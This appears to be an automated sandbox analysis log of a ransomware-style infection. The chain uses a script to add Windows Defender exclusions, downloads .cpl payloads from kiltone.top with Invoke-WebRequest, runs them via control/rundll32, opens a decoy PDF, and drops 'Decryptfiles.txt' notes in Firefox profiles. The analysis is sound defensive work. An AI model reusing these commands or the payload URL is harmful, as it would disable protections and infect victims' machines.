Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\
Source: svchost.exe, 0000000E.00000002.2703735202.000002794C655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2700987159.000002794722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4.32.drBinary or memory string: "VMware V[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal.tyKf
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\Decryptfiles.txt
